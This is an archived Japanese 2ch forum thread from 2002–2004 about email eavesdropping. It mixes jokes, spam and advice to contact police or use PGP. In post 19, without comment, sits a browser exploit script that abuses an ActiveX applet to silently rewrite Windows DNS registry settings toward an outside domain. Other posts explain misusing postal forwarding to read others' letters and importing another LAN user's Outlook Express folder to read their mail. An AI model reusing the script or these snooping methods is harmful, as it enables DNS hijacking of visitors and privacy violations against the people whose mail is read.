2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

■■■■■メールの盗聴■■■■■

1 ::02/08/19 22:56
について
さあ語れ!


2 : :02/08/19 23:05
やっても別におもしろくない

3 :名無しさん@お腹いっぱい。:02/08/19 23:07
3ゲトー

4 :名無しさん@お腹いっぱい。:02/08/19 23:08
はいはい、ごめんなさいねぇ
■■■■■■■■■■■■ 終了 ■■■■■■■■■■■■

5 :名無しさん@お腹いっぱい。:02/08/19 23:09
ハイヤ、イヤサッサ!

6 :_:02/08/19 23:15
ガイシュツ
http://pc.2ch.net/test/read.cgi/sec/1023267675/l50

7 ::02/08/20 00:38
>>6
犯罪者のスレといっしょにしないでくれ。
身を守るためのスレでもあるのだよ。


8 :名無しさん@お腹いっぱい。:02/08/20 00:41
>>1が他力本願な時点で





■■■■■■■■■■■■■■■終了■■■■■■■■■■■■■■■

9 :名無しさん@お腹いっぱい。:02/08/20 00:43
>>8
お前が終了しろ

10 : :02/08/20 00:44
8は自殺しました

11 :名無しさん@お腹いっぱい。:02/08/20 00:56
メールは盗『聴』するものじゃないと思ふ。

12 :名無しさん@お腹いっぱい。:02/08/20 01:25
































13 :名無しさん@お腹いっぱい。:02/08/20 01:26
 

14 :   :02/08/20 19:03
うぇーん。ジャパンネットバンクと間違えて
        ジャパネットたかたに大金振り込んだよ〜〜〜〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
            ∧_∧
          ( ´Д⊂ヽ
          ⊂    ノ
           人  Y
          し (_)
   / ̄ ̄'' -、
  (    / ) ヽ
  i r-,,,, /,,,, )
 ( >| ●  ●//  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  `‐|   U  /ノ <ヤパネット高田・淳二
   \ ━ /    \____________
   ((Οっ V>
    \  'oヽ
     |,,,,,,∧|
     /  ∧ \
   / / ヽ ヽ
   ト-<    |_/''┐

15 : :02/08/20 22:24

防ぐ方法はあるのか?


16 :名無しさん@お腹いっぱい。:02/08/20 22:42
>>14
振込先名で間違えるのは無理だと思うけど、システム上……
偶然口座名が一致しない限りw

ってネタにマジレスしてスマソ

17 :名無しさん@お腹いっぱい。:02/08/20 23:52
なんだったら僕の菊の穴貸してもいいよ

18 : :02/08/20 23:54


これはどういう犯罪になる?
告訴できる?



19 :名無しさん@お腹いっぱい。:02/08/21 09:35
<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi3(){
try{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try{

Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\SearchList","roots-servers.net");
}
catch(e){}
}
catch(e){}
}
setTimeout("yuzi3()",1000);
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi2(){
try{
a2=document.applets[0];a2.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a2.createInstance();Shl = a2.GetObject();a2.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try{

Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\EnableDns","1");
}
catch(e){}
}
catch(e){}
}setTimeout("yuzi2()",1000);
</script>

20 : :02/08/21 22:00

告訴告訴


21 : :02/08/22 22:07
あげ

22 :名無しさん@お腹いっぱい。:02/08/22 23:10
シコシコピュ!

23 : :02/08/23 20:12

マジメールの盗聴や
Web盗聴で困っている。

どれだけ証拠をつかめば逮捕できるのか?

不正アクセスで犯罪になるんでしょ?


24 :名無しさん@お腹いっぱい。:02/08/23 20:15
どういう盗聴か分からないとな…

25 :名無しさん@お腹いっぱい。:02/08/23 20:26
>>24
夜中、壁にコップ押し付けて隣の音聴くアレです。

時折思い切りカベをぶっ叩いてあげましょう。

26 :名無しさん@お腹いっぱい。:02/08/23 21:59
うむ。
困ってるなら単に警察行け。以上。

27 :名無しさん@お腹いっぱい。:02/08/23 22:08
はいどーぞ

▼都道府県警察本部のハイテク犯罪相談窓口等一覧
http://www.npa.go.jp/hightech/soudan/hitech-sodan.htm

28 :名無しさん@お腹いっぱい。:02/08/23 22:13
人のEメール盗み読みするのってどんどんセキュリティ技術が進歩してきてるから
並のハッキングスキルじゃあ難しくなってるけど
人ん家のポストに入れられた手紙は簡単に盗み読みできますが何か?

29 :名無しさん@お腹いっぱい。:02/08/23 23:28
>>28
他人の手紙から情報の取り出し、痕跡残さずにやってみれ。難しいから。

30 : :02/08/23 23:31
はがきなら簡単だな。

31 :名無しさん@お腹いっぱい。:02/08/23 23:33
盗んだまんまにすりゃおk

32 :名無しさん@お腹いっぱい。:02/08/23 23:53
>>30
終日他人のポストの前に陣取って、いつ来るかもわからない、
書いてある内容も予想がつかない他人宛ての手紙を待ちつづけるという手間も含めて
はがきなら簡単だとおっしゃっているんですね?

33 :cheshire-cat ◆CATJR.v6 :02/08/24 00:12
ふと思った。
郵便局に「転居したから転送してね」って届を、空家の住所宛てで出す。

34 : :02/08/24 00:15
>>32
あほな
ここでは大きな声ではいえないが
郵便局へ申し出れば誰でも簡単な手続きで人の郵便物を転送できる。
自分に転送しておき
後でその人のポストに入れておけばよい。

*これは犯罪なのでやってはいけない。



35 :名無しさん@お腹いっぱい。:02/08/24 00:21
転送届けってものすごくあっさり受け取ってくれる
都市部は知らんけど地方はとくにね

36 :名無しさん@お腹いっぱい。:02/08/24 02:55
>>28
オレは痕跡のこさずなんて言ってない。
ただ郵便受けから取ってくるのが簡単だって言ってるだけ

37 :名無しさん@お腹いっぱい。:02/08/24 03:32
他人のポストに対してアクションを起こすときって他人の目が気にならない?

38 : :02/08/25 00:57
>>37
やったことあるみたいだな。

39 : :02/08/25 22:32

人のメールとか盗聴して
なにになるのかさっぱりわからん。



40 :名無しさん@お腹いっぱい。:02/08/26 04:05

うぇーん。http://www.urban.ne.jp/home/kfso/internet.htm
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
            ∧_∧
          ( ´Д⊂ヽ
          ⊂    ノ
           人  Y
          し (_)



41 :名無しさん@お腹いっぱい。:02/08/26 04:27
>>39
そういう奴は盗聴したい「特定の個人」が居るんだろ。
例えばストーカーとかさ。
どこの馬の骨とも分からんメールを盗聴したって、面白くもなんとも無い。

42 : :02/08/26 22:21
>>41
こわい
捕まえるにはどうしたらいいの?



43 :名無しさん@お腹いっぱい。:02/08/26 23:20
うざいなあ。
何度も何度も何度も何度も何度も何度も何度も何度も何度も何度も何度も言われてるように

警  察  行  け  。

なんで個人でどうにかしようとするんだ?

44 :名無しさん@お腹いっぱい。:02/08/27 01:18
漏れもメール盗聴受けたけど、はっきり言ってメールに
プライバシーも糞も無いよ。

45 :41:02/08/27 01:29
そういう訳で、盗聴の犯人は知り合いの可能性が高いだろうな。

46 : :02/08/27 22:19

こわいこわいこわいこわいこわいこわいこわいこわいこわいこわいこわいこわい

YO−−!



47 : クッキーがないか期限切れです!:02/08/28 00:15
>>44
どういうふうに?

48 : :02/08/28 01:16



ttp://moon.gaiax.com/home/d_show

49 : :02/08/29 22:45

気味が悪い気味が悪い気味が悪い気味が悪い気味が悪い気味が悪い
そんなことしてなんになるのか・・目的がわかんない

やっぱり警察へ行くしかないのか・・・
警察は嫌いだが(糞


50 :名無しさん@お腹いっぱい。:02/08/30 08:12
大分医大教授、女性技官のメールを盗み見
ttp://www.asahi.com/national/update/0829/013.html


51 :名無しさん@お腹いっぱい。:02/08/30 13:54
メールを盗聴されてるとか、覗かれてるとか、心当たりがあるんなら、PGPでもつかっとけ(藁

それでも、いつかは破られるかもしれんが、気休め程度にはなるだろ((笑)

52 : :02/08/31 01:06

1年以下の懲役または50万円以下の罰金か・・・



53 :名無しさん:02/08/31 01:31
ねこさんかわいい

54 :名無しさん@お腹いっぱい。:02/08/31 01:46
つーかパスワード変えたら?

55 : :02/08/31 10:12
パスワードなんて変えても
解析ソフトで簡単に見つかるよ。


56 :名無しさん@お腹いっぱい。:02/08/31 12:35
メールってどうやって聴くんですか?

57 :名無しさん@お腹いっぱい。:02/08/31 12:44
>>56
文字だから聴けないね
きけたらちょうじん
ぶっ!!

58 :名無しさん@お腹いっぱい。:02/08/31 13:54
マジレス。ziplip使え。

59 :名無しさん@お腹いっぱい。:02/08/31 14:14
メールってどうやって聞くんですか?

60 :名無しさん@お腹いっぱい。:02/08/31 14:16
メールってどうやって開くんですか?

61 : :02/08/31 14:23
おしゃべりマウスあるじゃん

62 : :02/08/31 15:34

インターネットの場合、ほとんどの情報は、はがき同様、他人が読める形で流れている。
http://www.asahi.com/tech/dojo/K2002052302280.html


63 :サンプル盛り沢山:02/08/31 20:19
オカズにするなら、有料より『無料』!!
そんな貴方のために、できました⇒無料サイト♪
近親相姦・SM・人妻あります!!
http://www.traffimagic.com/WIPE7MMLZCA/comein/JPMVS

64 :不安盛り沢山:02/08/31 23:13
モラルなきrootが会員のメールを見てるなんてことある?

ま、>62 がいうようにメールは所詮葉書みたいなもんなので、
見られて困るようなメールは送らないようにはしてるが。

65 :名無しさん@お腹いっぱい。:02/08/31 23:17
>>64
ないということになっている。昔の性善説なインターネットは良かった…

66 :名無しさん@お腹いっぱい。:02/09/01 01:11
>>64

65とだぶるけど、まぢレスすれば、rootなら管理の都合上サーバーにはフルアクセスの
権限をもってるから、見ようと思えば簡単にみれるよ。
忍び込んでrootになりすまして覗くのは、当然悪いことだと認識されるけど、
本物の管理者がrootで職務以外に自分の興味から覗き見するのはもっと悪いことなのに
表面化することがあまりないからたちがわるい。。。

67 :不安盛り沢山:02/09/01 09:35
さらに思うのは、会社のトップのメールなんかも読めると思うんだが、
そこんとこどうしてるのかと。

オレは小さな会社のを任されているわけだが、
/var/spool/mail
を見れば、生のメールがそこにあるわけで。

この誘惑に抗しきれないヤツはきっといるに違いない、と思うんだが。
(オレは精神衛生上いくないので見たことがないヘタレだが)

rootであっても見ることができないような仕組みがあればいいんだがな。

68 :名無しさん@お腹いっぱい。:02/09/01 11:15
>>67

ある意味、蛇の生殺しだな(藁

よく、警察無線などのプライバシー情報が含まれる無線通信を受信してる趣味のヤシが
いるが、電波法では、第59条に、内容を聞いても罪にはならんが、内容を第三者に漏洩し
たり、聞いた内容によって利益を得たりすると罰せられるというのがあるんだな。

それと同じことで、管理者は、あくまでも職務上の一環としてというのが前提だが、
第三者宛のメールを見たとしても、内容を自分以外の第三者に口外しないという守秘義務
を自分に課せられる精神的に強い人が良い管理者だとおもうぞ。

見たい衝動はわかるけど、ぐっとこらえるのも、管理者の重要なスキルだと思うぞ。

69 : :02/09/02 22:17

生殺しつーか
普通は興味ないと思うけどな・・・


70 :名無しさん@お腹いっぱい。:02/09/03 00:32
蛇の生殺しの使い方が微妙に違うに100カノッサ。

>>69
全体には興味ない。フィルタに反応するものは見る。
ある特定個人のメールを見るかどうかはその管理者のへなちょこ加減次第(笑)

 1) ショルダーハック的に読まれる(本人の居ない間のPC/携帯借用 or 「後ろから覗き見」)
 2) 契約メールサーバにおいて興味本位の管理者に読まれる or 不正侵入者に読まれる
 3) 相手に届くまでのインターネット内で捕まってまったくの第3者に「盗聴」される
 4) 相手のメールサーバにおいて興味本位の管理者か侵入者かフィルタにかかって(笑)読まれる
 5) 届いた相手が不用意なためショルダーハック的に読まれる

ええと、機会はこれくらい?
で、今回の2はアレだ、管理者と差出人が「知り合い(つながり)」な場合マズいかも、と。

71 :名無しさん@お腹いっぱい。:02/09/03 14:52
.

72 : :02/09/04 00:15
>>70
3の意図的に人のメールを読むが
一番気持ち悪い。


73 :名無しさん@お腹いっぱい。:02/09/05 00:00
そう言われても基本的にソレだけは防げないし。
暗号化すればとりあえず読めないけどかえって興味を引いてしまう罠

74 :名無しさん@お腹いっぱい。:02/09/06 07:02
ものすごーく、メールの流通量を社内全体で増やして、とてもちょっとやそっとでは全部に目を通しきれないくらいなやりとりをすれば、特定個人のものだけ狙って覗こうとされてる場合以外なら有効な手段かも?
なんていうのはどう?



75 : :02/09/08 13:19

>>49
自分もやられて非常に迷惑しています。
ひきようなやり方だと思うし。
盗聴のみならず第三者に流すのは明らかに名誉毀損。

人のメールを見てどうしようというのか?
何が面白いのか
目的がわからないし
ホント気味が悪いです。

とりあえず告訴してみる。




76 :名無しさん@お腹いっぱい。:02/09/09 15:49
×盗聴→○窃視

77 : :02/09/14 15:35
age

78 :名無しさん@お腹いっぱい。:02/09/14 15:38
会社はあなたのメールを監視できるのか――弁護士が判例を基に解説
「メールを監視する際には,ポリシーの規定とその周知が重要」
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020913/1/

79 :名無しさん@お腹いっぱい。:02/09/14 19:17
メールには簡単な暗号かかっているだろう、
暗号を解読して読む行為は、封書を開けて内容を読むに等しい犯罪ですな、
はがきへ暗号書くアフォがいたとしても見るくらいであれば問題ないと判断
すべきでは?要は暗号の有無でしょう。
法律にしっかり書いてある。
会社内でやり取りするメールを内部の人間は見ても何の問題ないと思います。
ただし、対外関係のメールであれば立派な犯罪になりますよ。



80 :名無しさん@お腹いっぱい。:02/09/15 00:13
> メールには簡単な暗号かかっているだろう
えーっと…

81 :名無しさん@お腹いっぱい。:02/09/15 12:15
>>80

激しくワラタ

82 : :02/09/19 00:36
>>81
なにが禿しくおかしいかワカラン

83 :名無しさん@お腹いっぱい。:02/09/20 23:22
メール盗み見されてるなんて、一体どうやってわかるの?

84 :名無しさん@お腹いっぱい。:02/09/21 00:41
>>83
さあ、人間不信の世界へようこそ

85 :名無しさん@お腹いっぱい。:02/09/21 02:27
スレも読まない>>83のような注意力では絶対に気づかないとだけ忠告。

86 : :02/09/26 23:45
>>83
っと思っている人は読まれて
ばらまかれています。


87 : :02/10/08 00:29
ストーカーって
気味悪いよー


88 : :02/12/09 08:42
ほんと困るねネットストーカー
うっとーしいったらありゃしない。

89 :山崎渉:03/01/15 15:56
(^^)

90 :山崎渉:03/04/17 12:33
(^^)

91 :山崎渉:03/04/20 06:04
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

92 :山崎渉:03/05/28 17:17
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉

93 :名無しさん@お腹いっぱい。:03/06/30 01:49
メール(ハガキ)を送るとファイアーウォールが少し反応する
暗号メール(封筒)を送ると更に反応する
因みにパス暗号、ファイルは2048ビット


94 :山崎 渉:03/07/15 11:10

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

95 :ぼるじょあ ◆yBEncckFOU :03/08/02 05:25
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

96 :山崎 渉:03/08/15 22:53
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

97 :名無しさん@お腹いっぱい。:03/08/29 00:11
hharuki@jn4.so-net.ne.jp  送る

98 :名無しさん@お腹いっぱい。:03/10/14 23:48
a

99 :名無しさん@お腹いっぱい。:03/12/31 13:49
あけましておめでとうございます。
本年もよろしくお願い致します。
思い起こせば4半世紀の永きにわたり、私どもを支えてくださった皆様のおかげと、
心の底より感謝しております。

100 :名無しさん@お腹いっぱい。:03/12/31 14:04
LAN上の他のPCでOSが98かMe、メールソフトがOEなら、
C:\Windows\Application Data\Identities\Microsoft\OutlookExpress
をそのまま自分のOEにインポートすれば
既に保存されている分は普通に読めるわな。
リアルタイムで入ってくるメールを読むわけではないから
ここで言う「盗聴」には当たらないが。

101 :名無しさん@お腹いっぱい。:04/01/01 16:40
管理者権限を奪取して
サーバーにログインするには
どうするんですか ?

102 :名無しさん@お腹いっぱい。:04/01/20 00:32
>>19は何のプログラムなの?

103 :名無しさん@お腹いっぱい。:04/01/20 00:49
御前等色々言ってるが、亜米利加合衆国の国家安全保障局(通称NSA)のエシュロンは、
地球上に存在するありとあらゆる通信を傍受する事が出来る。
NSAは冷戦時代に蘇緯埃社会主義共和国連邦の全電話を盗聴する事が出来ると居われた。
光ファイバーケーブルを使った通信は傍受出来無いと言われていたが、
NSAは光ファイバーでの通信を傍受を可能にするシステムの開発に成功した。
FAXも全て傍受される。勿論E‐mailもだ。
エシュロンは一日に35億ものあらゆる通信を傍受している。
青森県の三沢基地に在る通称ゴルフボールと言われるレーダー装置もエシュロンの一部だ。
さらに特定の人物の声紋をディジタル化して置けば、其人物が世界中の何処で電話しようとも瞬時に会話の録音が始まる。
橋本龍太郎元総理もNSAに会話を聞かれて居た。
NSAとは関係無いが、CIAは蜻蛉型の盗聴器の開発に成功した。
通信は全て亜米利加に筒抜けに為ってるとは
恐ろしい時代だ・・・。

104 :名無しさん@お腹いっぱい。:04/02/01 01:47
age

105 :名無しさん@お腹いっぱい。:04/02/03 01:39
無差別に傍受出来るもんだからって、実は有用な情報の特定に結びつくことは少ない。
35億のあらゆる通信を一々チェック出来るほど人手も時間も無いからな。
結局、盗聴が必要な人物に絞られるわけだが、そういう人間は盗聴されていることを心得ている場合が多い。
それでも、盗聴しないよりは情報が集まってくるかもしれないが、効率的とはいえない。
まあ、偉くなったらテレフォンセックスには気をつけろってこった。

106 :103:04/02/03 11:48
>>105
35億件の通信を傍受後に検索をかけるからな、
まあ検索にひっかからなければ聴かれることも無いのだが・・・。

107 :名無しさん@お腹いっぱい。:04/02/03 11:51
メールの著名に「東京タワー」、「爆弾」を入れたら、
エロい人に毎日メール読んでもらえるのかな?

108 :名無しさん@お腹いっぱい。:04/02/07 05:06
>>103
そういうとこに勤めてる人は色んな意味で大変だすな
周囲に勤め先言えないとかあるかな(そんな仕事は他にもあるが)

109 :名無しさん@お腹いっぱい。:04/02/08 08:23
りもめってパソコン用メールを「覗きに行く」っていうけど
あれは盗み見してるてことなの?
でも自分で見るのは盗みじゃないね。なんていえばいいんだ
送受信中じゃなくてサーバにあっても見れるんだもんね

110 :103:04/02/08 15:31
そもそもNSA等の存在が明らかに為ったのは、エシュロン参加国の一つ濠太剌利の情報官が
暴露した事に起因するもので未だ世界、特に亜米利加合衆国には隠された情報機関が多数存在するものと思われる。

111 :名無しさん@お腹いっぱい。:04/03/19 19:19
管理者が朝日新聞関係者や創価学会だとヤバイことになる。

112 :名無しさん@お腹いっぱい。:04/05/02 18:58
社内のメールトラフィックを監視して、NGワードにヒットする内容を
抽出したりとかのツール使った事ある人いますか?
使い心地とか、値段とか、どんなのがあるか教えてください。
http://www.hammock.jp/mailwatcher/
ちなみに、ググったらこんなのみつけました。来れ使った事あるひといます?

113 :名無しさん@お腹いっぱい。:04/05/05 01:57
盗聴を怖がる者ほど、盗聴に値しないことが多い


114 :名無しさん@お腹いっぱい。:04/05/05 02:03
重要な連絡はFAXを使いなさい

115 :名無しさん@お腹いっぱい。:04/05/05 03:09
>>114
釣りか?重要な連絡はDHLだろw つかFAXだって簡単に傍受できるし。

116 :名無しさん@お腹いっぱい。:04/05/05 03:19
>>115
FAXは復号できないんだよ

23 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)